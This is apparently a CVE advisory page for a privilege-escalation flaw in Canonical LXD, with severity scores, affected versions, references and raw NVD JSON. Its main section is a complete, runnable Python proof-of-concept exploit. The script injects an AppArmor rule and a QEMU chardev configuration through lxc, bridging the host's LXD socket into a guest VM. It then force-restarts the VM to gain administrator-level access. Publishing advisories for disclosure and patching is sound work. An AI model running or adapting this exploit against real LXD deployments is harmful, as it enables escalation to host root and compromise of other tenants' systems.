Security Vulnerability Report
CVE-2026-34177 CVSS 9.1 CRITICAL

Published: 2026-04-09 10:16:22
Last Modified: 2026-04-22 20:57:23

Description

Canonical LXD versions 4.12 through 6.7 contain an incomplete denylist in isVMLowLevelOptionForbidden (lxd/project/limits/permissions.go), which omits raw.apparmor and raw.qemu.conf from the set of keys blocked under the restricted.virtual-machines.lowlevel=block project restriction. A remote attacker with can_edit permission on a VM instance in a restricted project can inject an AppArmor rule and a QEMU chardev configuration that bridges the LXD Unix socket into the guest VM, enabling privilege escalation to LXD cluster administrator and subsequently to host root.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:* (versions 4.12 through 5.0.6) - VULNERABLE
cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:* (versions 5.21.0 through 5.21.4) - VULNERABLE
cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:* (versions 6.0 through 6.7) - VULNERABLE
Canonical LXD 4.12 - 6.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
import subprocess
import sys

# Exploit for CVE-2026-34177: LXD Privilege Escalation via Config Injection
# Target: Canonical LXD 4.12 <= 6.7

TARGET_VM = "target-vm"
LXD_SOCKET_PATH = "/var/snap/lxd/common/lxd/unix.socket"


def exploit():
    print(f"[*] Attempting to exploit {TARGET_VM}...")

    # 1. Inject AppArmor rule to allow access to the LXD Unix socket
    # This overrides the security profile blocking the socket
    apparmor_payload = f"unix (connect, send, receive) type=stream addr=\"@{LXD_SOCKET_PATH}\","
    print(f"[*] Injecting AppArmor rule: {apparmor_payload}")
    try:
        subprocess.run(["lxc", "config", "set", TARGET_VM, "raw.apparmor", apparmor_payload], check=True)
    except subprocess.CalledProcessError as e:
        print(f"[-] Failed to set raw.apparmor: {e}")
        sys.exit(1)

    # 2. Inject QEMU configuration to bridge the socket into the VM
    # This creates a virtio-serial port connected to the host socket
    qemu_payload = f"""
[chardev "lxd-sock"]
path = "{LXD_SOCKET_PATH}"
backend = "socket"

[device "dev-lxd-sock"]
driver = "virtio-serial-pci"

[device "port-lxd-sock"]
driver = "virtserialport"
name = "org.linuxcontainers.lxd"
chardev = "lxd-sock"
"""
    print("[*] Injecting QEMU chardev configuration...")
    try:
        subprocess.run(["lxc", "config", "set", TARGET_VM, "raw.qemu.conf", qemu_payload], check=True)
    except subprocess.CalledProcessError as e:
        print(f"[-] Failed to set raw.qemu.conf: {e}")
        sys.exit(1)

    # 3. Restart the VM to apply the configuration changes
    print(f"[*] Restarting {TARGET_VM} to apply changes...")
    try:
        subprocess.run(["lxc", "restart", TARGET_VM, "--force"], check=True)
    except subprocess.CalledProcessError as e:
        print(f"[-] Failed to restart VM: {e}")
        sys.exit(1)

    print("[+] Exploit successful!")
    print(f"[+] The LXD Unix socket is now available inside the VM at /dev/virtio-ports/org.linuxcontainers.lxd")
    print("[+] You can now interact with the LXD API as root from within the VM.")


if __name__ == "__main__":
    exploit()
```

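References

https://github.com/canonical/lxd/pull/17909 (Issue Tracking)
https://github.com/canonical/lxd/security/advisories/GHSA-fm2x-c5qw-4h6f (Third Party Advisory)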

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34177", "sourceIdentifier": "[email protected]", "published": "2026-04-09T10:16:21.653", "lastModified": "2026-04-22T20:57:22.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Canonical LXD versions 4.12 through 6.7 contain an incomplete denylist in isVMLowLevelOptionForbidden (lxd/project/limits/permissions.go), which omits raw.apparmor and raw.qemu.conf from the set of keys blocked under the restricted.virtual-machines.lowlevel=block project restriction. A remote attacker with can_edit permission on a VM instance in a restricted project can inject an AppArmor rule and a QEMU chardev configuration that bridges the LXD Unix socket into the guest VM, enabling privilege escalation to LXD cluster administrator and subsequently to host root."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-184"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.12", "versionEndIncluding": "5.0.6", "matchCriteriaId": "41A5CC7C-00BE-436D-957A-4636E52D0DF1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.21.0", "versionEndIncluding": "5.21.4", "matchCriteriaId": "92A82DF4-3ED9-47E0-BDF1-DB9138EE0883"}, {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "6.0", "versionEndIncluding": "6.7", "matchCriteriaId": "5C28FC63-0BE4-4B40-A87F-DF242AE33303"}]}]}], "references": [{"url": "https://github.com/canonical/lxd/pull/17909", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/canonical/lxd/security/advisories/GHSA-fm2x-c5qw-4h6f", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/canonical/lxd/security/advisories/GHSA-fm2x-c5qw-4h6f", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}